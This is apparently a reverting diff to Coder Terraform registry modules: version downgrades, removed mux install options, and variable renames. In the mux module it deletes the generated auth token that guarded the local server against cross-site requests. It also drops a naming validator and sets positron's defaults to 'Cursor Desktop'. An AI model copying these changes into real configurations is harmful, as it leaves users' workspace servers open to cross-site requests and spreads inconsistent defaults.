-Use a private or mirrored npm registry:
-
-```tf
-module "mux" {
-  count        = data.coder_workspace.me.start_count
-  source       = "registry.coder.com/coder/mux/coder"
-  version      = "1.3.1"
-  agent_id     = coder_agent.main.id
-  registry_url = "https://npm.pkg.github.com"
-}
-```
-
 ### Use Cached Installation
 
 Run an existing copy of Mux if found, otherwise install from npm:
@@ -132,7 +89,7 @@ Run an existing copy of Mux if found, otherwise install from npm:
 module "mux" {
   count      = data.coder_workspace.me.start_count
   source     = "registry.coder.com/coder/mux/coder"
-  version    = "1.3.1"
+  version    = "1.0.8"
   agent_id   = coder_agent.main.id
   use_cached = true
 }
@@ -146,7 +103,7 @@ Run without installing from the network (requires Mux to be pre-installed):
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.3.1"
+  version  = "1.0.8"
   agent_id = coder_agent.main.id
   install  = false
 }
@@ -160,6 +117,4 @@ module "mux" {
 
 - Mux is currently in preview and you may encounter bugs
 - Requires internet connectivity for agent operations (unless `install` is set to false)
-- Auto-detects `npm`, `pnpm`, or `bun` by default; set `package_manager` to force a specific one
-- Installs `mux@next` from the npm registry by default; set `registry_url` to use a private or mirrored registry
-- Falls back to a direct tarball download when no package manager is found
+- Installs `mux@next` from npm by default (falls back to the npm tarball if npm is unavailable)

registry/coder/modules/mux/main.test.ts

@@ -1,11 +1,6 @@
 import { describe, expect, it } from "bun:test";
 import {
   executeScriptInContainer,
-  execContainer,
-  findResourceInstance,
-  readFileContainer,
-  removeContainer,
-  runContainer,
   runTerraformApply,
   runTerraformInit,
   testRequiredVariables,
@@ -35,7 +30,7 @@ describe("mux", async () => {
     }
     expect(output.exitCode).toBe(0);
     const expectedLines = [
-      "📥 No package manager found; downloading tarball from registry...",
+      "📥 npm not found; downloading tarball from npm registry...",
       "🥳 mux has been installed in /tmp/mux",
       "🚀 Starting mux server on port 4000...",
       "Check logs at /tmp/mux.log!",
@@ -45,57 +40,6 @@ describe("mux", async () => {
     }
   }, 60000);
 
-  it("parses custom additional_arguments", async () => {
-    const state = await runTerraformApply(import.meta.dir, {
-      agent_id: "foo",
-      install: false,
-      log_path: "/tmp/mux.log",
-      additional_arguments:
-        "--open-mode pinned --add-project '/workspaces/my repo'",
-    });
-
-    const instance = findResourceInstance(state, "coder_script");
-    const id = await runContainer("alpine/curl");
-
-    try {
-      const setup = await execContainer(id, [
-        "sh",
-        "-c",
-        `apk add --no-cache bash >/dev/null
-mkdir -p /tmp/mux
-cat <<'EOF' > /tmp/mux/mux
-#!/usr/bin/env sh
-i=1
-for arg in "$@"; do
-  echo "arg$i=$arg"
-  i=$((i + 1))
-done
-EOF
-chmod +x /tmp/mux/mux`,
-      ]);
-      expect(setup.exitCode).toBe(0);
-
-      const output = await execContainer(id, ["sh", "-c", instance.script]);
-      if (output.exitCode !== 0) {
-        console.log("STDOUT:\n" + output.stdout);
-        console.log("STDERR:\n" + output.stderr);
-      }
-      expect(output.exitCode).toBe(0);
-
-      await execContainer(id, ["sh", "-c", "sleep 1"]);
-      const log = await readFileContainer(id, "/tmp/mux.log");
-      expect(log).toContain("arg1=server");
-      expect(log).toContain("arg2=--port");
-      expect(log).toContain("arg3=4000");
-      expect(log).toContain("arg4=--open-mode");
-      expect(log).toContain("arg5=pinned");
-      expect(log).toContain("arg6=--add-project");
-      expect(log).toContain("arg7=/workspaces/my repo");
-    } finally {
-      await removeContainer(id);
-    }
-  }, 60000);
-
   it("runs with npm present", async () => {
     const state = await runTerraformApply(import.meta.dir, {
       agent_id: "foo",
@@ -111,7 +55,7 @@ chmod +x /tmp/mux/mux`,
     expect(output.exitCode).toBe(0);
     const expectedLines = [
       "📦 Installing mux via npm into /tmp/mux...",
-      "⏭️  Skipping lifecycle scripts with --ignore-scripts",
+      "⏭️  Skipping npm lifecycle scripts with --ignore-scripts",
       "🥳 mux has been installed in /tmp/mux",
       "🚀 Starting mux server on port 4000...",
       "Check logs at /tmp/mux.log!",

registry/coder/modules/mux/main.tf

@@ -7,10 +7,6 @@ terraform {
       source  = "coder/coder"
       version = ">= 2.5"
     }
-    random = {
-      source  = "hashicorp/random"
-      version = ">= 3.0"
-    }
   }
 }
 
@@ -49,41 +45,18 @@ variable "log_path" {
   default     = "/tmp/mux.log"
 }
 
-variable "add_project" {
+variable "add-project" {
   type        = string
   description = "Optional path to add/open as a project in Mux on startup."
   default     = null
 }
 
-variable "additional_arguments" {
-  type        = string
-  description = "Additional command-line arguments to pass to `mux server` (for example: `--add-project /path --open-mode pinned`)."
-  default     = ""
-}
-
 variable "install_version" {
   type        = string
   description = "The version or dist-tag of Mux to install."
   default     = "next"
 }
 
-variable "package_manager" {
-  type        = string
-  description = "Package manager to install Mux. 'auto' detects npm, pnpm, or bun (falling back to tarball download). Set to 'npm', 'pnpm', or 'bun' to force a specific one."
-  default     = "auto"
-  validation {
-    condition     = contains(["auto", "npm", "pnpm", "bun"], var.package_manager)
-    error_message = "The 'package_manager' variable must be one of: 'auto', 'npm', 'pnpm', 'bun'."
-  }
-}
-
-variable "registry_url" {
-  type        = string
-  description = "The npm-compatible registry URL to install Mux from. Override this for private registries or mirrors."
-  default     = "https://registry.npmjs.org"
-}
-
-
 variable "share" {
   type    = string
   default = "owner"
@@ -140,23 +113,6 @@ variable "open_in" {
   }
 }
 
-# Per-module auth token for cross-site request protection.
-# We pass this token into each mux process at launch time (process-scoped env)
-# and include it in the app URL query string (?token=...).
-#
-# Why process-scoped env instead of a shared coder_env value:
-# multiple mux module instances can target the same agent (different slug/port).
-# A single global MUX_SERVER_AUTH_TOKEN env key would cause collisions.
-resource "random_password" "mux_auth_token" {
-  length  = 64
-  special = false
-}
-
-locals {
-  mux_auth_token = random_password.mux_auth_token.result
-  registry_url   = trimsuffix(var.registry_url, "/")
-}
-
 resource "coder_script" "mux" {
   agent_id     = var.agent_id
   display_name = var.display_name
@@ -165,14 +121,10 @@ resource "coder_script" "mux" {
     VERSION : var.install_version,
     PORT : var.port,
     LOG_PATH : var.log_path,
-    ADD_PROJECT : var.add_project == null ? "" : var.add_project,
-    ADDITIONAL_ARGUMENTS : var.additional_arguments,
+    ADD_PROJECT : var.add-project == null ? "" : var.add-project,
     INSTALL_PREFIX : var.install_prefix,
     OFFLINE : !var.install,
     USE_CACHED : var.use_cached,
-    AUTH_TOKEN : local.mux_auth_token,
-    PACKAGE_MANAGER : var.package_manager,
-    REGISTRY_URL : local.registry_url,
   })
   run_on_start = true
 
@@ -188,7 +140,7 @@ resource "coder_app" "mux" {
   agent_id     = var.agent_id
   slug         = var.slug
   display_name = var.display_name
-  url          = "http://localhost:${var.port}?token=${local.mux_auth_token}"
+  url          = "http://localhost:${var.port}"
   icon         = "/icon/mux.svg"
   subdomain    = var.subdomain
   share        = var.share
@@ -202,3 +154,5 @@ resource "coder_app" "mux" {
     threshold = 6
   }
 }
+
+

registry/coder/modules/mux/mux.tftest.hcl

@@ -20,10 +20,8 @@ run "install_false_and_use_cached_conflict" {
   ]
 }
 
-# Needs command = apply because the URL contains random_password.result,
-# which is unknown during plan.
 run "custom_port" {
-  command = apply
+  command = plan
 
   variables {
     agent_id = "foo"
@@ -31,65 +29,8 @@ run "custom_port" {
   }
 
   assert {
-    condition     = startswith(resource.coder_app.mux.url, "http://localhost:8080?token=")
-    error_message = "coder_app URL must use the configured port and include auth token"
-  }
-
-  assert {
-    condition     = trimprefix(resource.coder_app.mux.url, "http://localhost:8080?token=") == random_password.mux_auth_token.result
-    error_message = "URL token must match the generated auth token"
-  }
-}
-
-# Needs command = apply because random_password.result is unknown during plan.
-run "auth_token_in_server_script" {
-  command = apply
-
-  variables {
-    agent_id = "foo"
-  }
-
-  assert {
-    condition     = strcontains(resource.coder_script.mux.script, "MUX_SERVER_AUTH_TOKEN=")
-    error_message = "mux launch script must set MUX_SERVER_AUTH_TOKEN"
-  }
-
-  assert {
-    condition     = strcontains(resource.coder_script.mux.script, random_password.mux_auth_token.result)
-    error_message = "mux launch script must use the generated auth token"
-  }
-}
-
-# Needs command = apply because random_password.result is unknown during plan.
-run "auth_token_in_url" {
-  command = apply
-
-  variables {
-    agent_id = "foo"
-  }
-
-  assert {
-    condition     = startswith(resource.coder_app.mux.url, "http://localhost:4000?token=")
-    error_message = "coder_app URL must include auth token query parameter"
-  }
-
-  assert {
-    condition     = trimprefix(resource.coder_app.mux.url, "http://localhost:4000?token=") == random_password.mux_auth_token.result
-    error_message = "URL token must match the generated auth token"
-  }
-}
-
-run "custom_additional_arguments" {
-  command = plan
-
-  variables {
-    agent_id             = "foo"
-    additional_arguments = "--open-mode pinned --add-project '/workspaces/my repo'"
-  }
-
-  assert {
-    condition     = strcontains(resource.coder_script.mux.script, "--open-mode pinned --add-project '/workspaces/my repo'")
-    error_message = "mux launch script must include the configured additional arguments"
+    condition     = resource.coder_app.mux.url == "http://localhost:8080"
+    error_message = "coder_app URL must use the configured port"
   }
 }
 
@@ -122,95 +63,4 @@ run "use_cached_only_success" {
   }
 }
 
-# Custom package_manager should appear in generated script
-run "custom_package_manager_npm" {
-  command = plan
-
-  variables {
-    agent_id        = "foo"
-    package_manager = "npm"
-  }
-
-  assert {
-    condition     = strcontains(resource.coder_script.mux.script, "PM_CMD=\"npm\"")
-    error_message = "mux script must set PM_CMD to the configured package manager"
-  }
-}
-
-run "custom_package_manager_pnpm" {
-  command = plan
-
-  variables {
-    agent_id        = "foo"
-    package_manager = "pnpm"
-  }
-
-  assert {
-    condition     = strcontains(resource.coder_script.mux.script, "PM_CMD=\"pnpm\"")
-    error_message = "mux script must set PM_CMD to the configured package manager"
-  }
-}
-
-run "custom_package_manager_bun" {
-  command = plan
-
-  variables {
-    agent_id        = "foo"
-    package_manager = "bun"
-  }
-
-  assert {
-    condition     = strcontains(resource.coder_script.mux.script, "PM_CMD=\"bun\"")
-    error_message = "mux script must set PM_CMD to the configured package manager"
-  }
-}
-
-# Invalid package_manager should fail validation
-run "invalid_package_manager" {
-  command = plan
-
-  variables {
-    agent_id        = "foo"
-    package_manager = "yarn"
-  }
-
-  expect_failures = [
-    var.package_manager
-  ]
-}
-
-# Custom registry_url should appear in generated script
-run "custom_registry_url" {
-  command = plan
-
-  variables {
-    agent_id     = "foo"
-    registry_url = "https://npm.example.com"
-  }
-
-  assert {
-    condition     = strcontains(resource.coder_script.mux.script, "https://npm.example.com")
-    error_message = "mux script must use the configured registry URL"
-  }
-
-  assert {
-    condition     = !strcontains(resource.coder_script.mux.script, "registry.npmjs.org")
-    error_message = "mux script must not contain hardcoded registry.npmjs.org when custom registry is set"
-  }
-}
-
-# registry_url trailing slash should be stripped
-run "registry_url_trailing_slash" {
-  command = plan
-
-  variables {
-    agent_id     = "foo"
-    registry_url = "https://npm.example.com/"
-  }
-
-  assert {
-    condition     = strcontains(resource.coder_script.mux.script, "https://npm.example.com/mux/")
-    error_message = "registry URL trailing slash must be stripped to avoid double slashes"
-  }
-}
 

registry/coder/modules/mux/run.sh

@@ -9,9 +9,7 @@ function run_mux() {
   rm -f "$HOME/.mux/server.lock"
 
   local port_value
-  local auth_token_value
   port_value="${PORT}"
-  auth_token_value="${AUTH_TOKEN}"
   if [ -z "$port_value" ]; then
     port_value="4000"
   fi
@@ -20,25 +18,9 @@ function run_mux() {
   if [ -n "${ADD_PROJECT}" ]; then
     set -- "$@" --add-project "${ADD_PROJECT}"
   fi
-
-  # Parse additional user-supplied server arguments while preserving quoted groups.
-  if [ -n "${ADDITIONAL_ARGUMENTS}" ]; then
-    local parsed_additional_arguments
-    if ! parsed_additional_arguments="$(printf "%s\n" "${ADDITIONAL_ARGUMENTS}" | xargs -n1 printf "%s\n" 2> /dev/null)"; then
-      echo "❌ Failed to parse additional_arguments. Ensure quotes are balanced."
-      exit 1
-    fi
-    while IFS= read -r parsed_arg; do
-      [ -n "$parsed_arg" ] || continue
-      set -- "$@" "$parsed_arg"
-    done << EOF
-$${parsed_additional_arguments}
-EOF
-  fi
-
   echo "🚀 Starting mux server on port $port_value..."
   echo "Check logs at ${LOG_PATH}!"
-  MUX_SERVER_AUTH_TOKEN="$auth_token_value" PORT="$port_value" "$MUX_BINARY" "$@" > "${LOG_PATH}" 2>&1 &
+  PORT="$port_value" "$MUX_BINARY" "$@" > "${LOG_PATH}" 2>&1 &
 }
 
 # Check if mux is already installed for offline mode
@@ -54,7 +36,7 @@ fi
 
 # If there is no cached install OR we don't want to use a cached install
 if [ ! -f "$MUX_BINARY" ] || [ "${USE_CACHED}" != true ]; then
-  printf "$${BOLD}Installing mux...\n"
+  printf "$${BOLD}Installing mux from npm...\n"
 
   # Clean up from other install (in case install prefix changed).
   if [ -n "$CODER_SCRIPT_BIN_DIR" ] && [ -e "$CODER_SCRIPT_BIN_DIR/mux" ]; then
@@ -63,76 +45,41 @@ if [ ! -f "$MUX_BINARY" ] || [ "${USE_CACHED}" != true ]; then
 
   mkdir -p "$(dirname "$MUX_BINARY")"
 
-  # Determine which package manager to use
-  PM_CMD=""
-  if [ "${PACKAGE_MANAGER}" = "auto" ]; then
-    for pm in npm pnpm bun; do
-      if command -v "$pm" > /dev/null 2>&1; then
-        PM_CMD="$pm"
-        break
-      fi
-    done
-  else
-    PM_CMD="${PACKAGE_MANAGER}"
-    if ! command -v "$PM_CMD" > /dev/null 2>&1; then
-      echo "❌ Configured package manager '${PACKAGE_MANAGER}' not found on PATH"
-      exit 1
-    fi
-  fi
-
-  if [ -n "$PM_CMD" ]; then
-    echo "📦 Installing mux via $PM_CMD into ${INSTALL_PREFIX}..."
+  if command -v npm > /dev/null 2>&1; then
+    echo "📦 Installing mux via npm into ${INSTALL_PREFIX}..."
     NPM_WORKDIR="${INSTALL_PREFIX}/npm"
     mkdir -p "$NPM_WORKDIR"
     cd "$NPM_WORKDIR" || exit 1
     if [ ! -f package.json ]; then
       echo '{}' > package.json
     fi
-    echo "⏭️  Skipping lifecycle scripts with --ignore-scripts"
+    echo "⏭️  Skipping npm lifecycle scripts with --ignore-scripts"
     PKG="mux"
     if [ -z "${VERSION}" ] || [ "${VERSION}" = "latest" ]; then
       PKG_SPEC="$PKG@latest"
     else
       PKG_SPEC="$PKG@${VERSION}"
     fi
-    INSTALL_OK=true
-    case "$PM_CMD" in
-      npm)
-        if ! npm install --no-audit --no-fund --omit=dev --ignore-scripts --registry "${REGISTRY_URL}" "$PKG_SPEC"; then
-          INSTALL_OK=false
-        fi
-        ;;
-      pnpm)
-        if ! pnpm add --ignore-scripts --registry "${REGISTRY_URL}" "$PKG_SPEC"; then
-          INSTALL_OK=false
-        fi
-        ;;
-      bun)
-        if ! bun add --ignore-scripts --registry "${REGISTRY_URL}" "$PKG_SPEC"; then
-          INSTALL_OK=false
-        fi
-        ;;
-    esac
-    if [ "$INSTALL_OK" != true ]; then
-      echo "❌ Failed to install mux via $PM_CMD"
+    if ! npm install --no-audit --no-fund --omit=dev --ignore-scripts "$PKG_SPEC"; then
+      echo "❌ Failed to install mux via npm"
       exit 1
     fi
     # Determine the installed binary path
     BIN_DIR="$NPM_WORKDIR/node_modules/.bin"
     CANDIDATE="$BIN_DIR/mux"
     if [ ! -f "$CANDIDATE" ]; then
-      echo "❌ Could not locate mux binary after $PM_CMD install"
+      echo "❌ Could not locate mux binary after npm install"
       exit 1
     fi
     chmod +x "$CANDIDATE" || true
     ln -sf "$CANDIDATE" "$MUX_BINARY"
   else
-    echo "📥 No package manager found; downloading tarball from registry..."
+    echo "📥 npm not found; downloading tarball from npm registry..."
     VERSION_TO_USE="${VERSION}"
     if [ -z "$VERSION_TO_USE" ]; then
       VERSION_TO_USE="next"
     fi
-    META_URL="${REGISTRY_URL}/mux/$VERSION_TO_USE"
+    META_URL="https://registry.npmjs.org/mux/$VERSION_TO_USE"
     META_JSON="$(curl -fsSL "$META_URL" || true)"
     if [ -z "$META_JSON" ]; then
       echo "❌ Failed to fetch npm metadata: $META_URL"
@@ -171,7 +118,7 @@ if [ ! -f "$MUX_BINARY" ] || [ "${USE_CACHED}" != true ]; then
         echo "❌ Could not determine version for mux"
         exit 1
       fi
-      TARBALL_URL="${REGISTRY_URL}/mux/-/mux-$VERSION_TO_USE.tgz"
+      TARBALL_URL="https://registry.npmjs.org/mux/-/mux-$VERSION_TO_USE.tgz"
     fi
     TMP_DIR="$(mktemp -d)"
     TAR_PATH="$TMP_DIR/mux.tgz"

registry/coder/modules/vscode-desktop-core/README.md

@@ -16,15 +16,15 @@ The VSCode Desktop Core module is a building block for modules that need to expo
 ```tf
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.2"
+  version = "1.0.1"
 
   agent_id = var.agent_id
 
-  coder_app_icon         = "/icon/code.svg"
-  coder_app_slug         = "vscode"
-  coder_app_display_name = "VS Code Desktop"
-  coder_app_order        = var.order
-  coder_app_group        = var.group
+  web_app_icon         = "/icon/code.svg"
+  web_app_slug         = "vscode"
+  web_app_display_name = "VS Code Desktop"
+  web_app_order        = var.order
+  web_app_group        = var.group
 
   folder      = var.folder
   open_recent = var.open_recent

registry/coder/modules/vscode-desktop-core/main.test.ts

@@ -11,9 +11,9 @@ const appName = "vscode-desktop";
 const defaultVariables = {
   agent_id: "foo",
 
-  coder_app_icon: "/icon/code.svg",
-  coder_app_slug: "vscode",
-  coder_app_display_name: "VS Code Desktop",
+  web_app_icon: "/icon/code.svg",
+  web_app_slug: "vscode",
+  web_app_display_name: "VS Code Desktop",
 
   protocol: "vscode",
 };
@@ -99,16 +99,16 @@ describe("vscode-desktop-core", async () => {
       );
 
       expect(coder_app?.instances[0].attributes.slug).toBe(
-        defaultVariables.coder_app_slug,
+        defaultVariables.web_app_slug,
       );
       expect(coder_app?.instances[0].attributes.display_name).toBe(
-        defaultVariables.coder_app_display_name,
+        defaultVariables.web_app_display_name,
       );
     });
 
     it("sets order", async () => {
       const state = await runTerraformApply(import.meta.dir, {
-        coder_app_order: "5",
+        web_app_order: "5",
 
         ...defaultVariables,
       });
@@ -122,7 +122,7 @@ describe("vscode-desktop-core", async () => {
 
     it("sets group", async () => {
       const state = await runTerraformApply(import.meta.dir, {
-        coder_app_group: "web-app-group",
+        web_app_group: "web-app-group",
 
         ...defaultVariables,
       });

registry/coder/modules/vscode-desktop-core/main.tf

@@ -31,28 +31,28 @@ variable "protocol" {
   description = "The URI protocol the IDE."
 }
 
-variable "coder_app_icon" {
+variable "web_app_icon" {
   type        = string
   description = "The icon of the coder_app."
 }
 
-variable "coder_app_slug" {
+variable "web_app_slug" {
   type        = string
   description = "The slug of the coder_app."
 }
 
-variable "coder_app_display_name" {
+variable "web_app_display_name" {
   type        = string
   description = "The display name of the coder_app."
 }
 
-variable "coder_app_order" {
+variable "web_app_order" {
   type        = number
   description = "The order of the coder_app."
   default     = null
 }
 
-variable "coder_app_group" {
+variable "web_app_group" {
   type        = string
   description = "The group of the coder_app."
   default     = null
@@ -65,12 +65,12 @@ resource "coder_app" "vscode-desktop" {
   agent_id = var.agent_id
   external = true
 
-  icon         = var.coder_app_icon
-  slug         = var.coder_app_slug
-  display_name = var.coder_app_display_name
+  icon         = var.web_app_icon
+  slug         = var.web_app_slug
+  display_name = var.web_app_display_name
 
-  order = var.coder_app_order
-  group = var.coder_app_group
+  order = var.web_app_order
+  group = var.web_app_group
 
   url = join("", [
     var.protocol,

registry/coder/modules/vscode-desktop/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "vscode" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/vscode-desktop/coder"
-  version  = "1.2.1"
+  version  = "1.2.0"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ module "vscode" {
 module "vscode" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/vscode-desktop/coder"
-  version  = "1.2.1"
+  version  = "1.2.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }

registry/coder/modules/vscode-desktop/main.tf

@@ -40,7 +40,7 @@ variable "group" {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.2"
+  version = "1.0.0"
 
   agent_id = var.agent_id
 

registry/coder/modules/windsurf/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "windsurf" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/windsurf/coder"
-  version  = "1.3.1"
+  version  = "1.3.0"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ module "windsurf" {
 module "windsurf" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/windsurf/coder"
-  version  = "1.3.1"
+  version  = "1.3.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }
@@ -45,7 +45,7 @@ The following example configures Windsurf to use the GitHub MCP server with auth
 module "windsurf" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/windsurf/coder"
-  version  = "1.3.1"
+  version  = "1.3.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
   mcp = jsonencode({

registry/coder/modules/windsurf/main.tf

@@ -65,7 +65,7 @@ locals {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.2"
+  version = "1.0.0"
 
   agent_id = var.agent_id
 

registry/coder/templates/azure-linux/README.md

@@ -27,21 +27,8 @@ This template provisions the following resources:
 
 - Azure VM (ephemeral, deleted on stop)
 - Managed disk (persistent, mounted to `/home/coder`)
-- Resource group, virtual network, subnet, and network interface (persistent, required by the managed disk and VM)
 
-### What happens on stop
-
-When a workspace is **stopped**, only the VM is destroyed. The managed disk, resource group, virtual network, subnet, and network interface all persist. This is by design — the managed disk retains your `/home/coder` data across workspace restarts, and the other resources remain because the disk depends on them.
-
-This means you will see these Azure resources in your subscription even when a workspace is stopped. This is expected behavior.
-
-### What happens on delete
-
-When a workspace is **deleted**, all resources are destroyed, including the resource group, networking resources, and managed disk.
-
-### Workspace restarts
-
-Since the VM is ephemeral, any tools or files outside of the home directory are not persisted across restarts. To pre-bake tools into the workspace (e.g. `python3`), modify the VM image, or use a [startup script](https://registry.terraform.io/providers/coder/coder/latest/docs/resources/script). Alternatively, individual developers can [personalize](https://coder.com/docs/dotfiles) their workspaces with dotfiles.
+This means, when the workspace restarts, any tools or files outside of the home directory are not persisted. To pre-bake tools into the workspace (e.g. `python3`), modify the VM image, or use a [startup script](https://registry.terraform.io/providers/coder/coder/latest/docs/resources/script). Alternatively, individual developers can [personalize](https://coder.com/docs/dotfiles) their workspaces with dotfiles.
 
 > [!NOTE]
 > This template is designed to be a starting point! Edit the Terraform to extend the template to support your use case.

registry/cytoshahar/modules/positron/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "positron" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/cytoshahar/positron/coder"
-  version  = "1.0.2"
+  version  = "1.0.1"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ module "positron" {
 module "positron" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/cytoshahar/positron/coder"
-  version  = "1.0.2"
+  version  = "1.0.1"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }

registry/cytoshahar/modules/positron/main.tf

@@ -41,13 +41,13 @@ variable "group" {
 variable "slug" {
   type        = string
   description = "The slug of the app."
-  default     = "positron"
+  default     = "cursor"
 }
 
 variable "display_name" {
   type        = string
   description = "The display name of the app."
-  default     = "Positron Desktop"
+  default     = "Cursor Desktop"
 }
 
 data "coder_workspace" "me" {}
@@ -55,7 +55,7 @@ data "coder_workspace_owner" "me" {}
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.2"
+  version = "1.0.0"
 
   agent_id = var.agent_id
 

scripts/terraform_validate.sh

@@ -11,34 +11,6 @@ set -euo pipefail
 #
 # This script only validates changed modules. Documentation and template changes are ignored.
 
-# Validates that Terraform variable names use underscores (snake_case) instead
-# of hyphens. Hyphens are technically valid but deprecated and non-idiomatic.
-# See: https://developer.hashicorp.com/terraform/language/values/variables
-validate_variable_names() {
-  local dir="$1"
-  local found_issues=0
-
-  while IFS= read -r tf_file; do
-    while IFS= read -r match; do
-      local line_num
-      line_num=$(echo "$match" | cut -d: -f1)
-      local line_content
-      line_content=$(echo "$match" | cut -d: -f2-)
-      local var_name
-      var_name=$(echo "$line_content" | sed -n 's/.*variable "\([^"]*\)".*/\1/p')
-
-      if [[ -n "$var_name" ]]; then
-        echo "  ERROR: $tf_file:$line_num"
-        echo "    Variable \"$var_name\" contains a hyphen."
-        echo "    Rename to \"${var_name//-/_}\" (use underscores instead of hyphens)."
-        found_issues=$((found_issues + 1))
-      fi
-    done < <(grep -n 'variable "[^"]*-[^"]*"' "$tf_file" 2> /dev/null || true)
-  done < <(find "$dir" -name '*.tf' -type f | sort)
-
-  return "$found_issues"
-}
-
 validate_terraform_directory() {
   local dir="$1"
   echo "Running \`terraform validate\` in $dir"
@@ -119,16 +91,6 @@ main() {
     fi
   done
 
-  echo ""
-  echo "==> Validating Terraform variable names use snake_case..."
-  for dir in $subdirs; do
-    if test -f "$dir/main.tf"; then
-      if ! validate_variable_names "$dir"; then
-        status=1
-      fi
-    fi
-  done
-
   exit $status
 }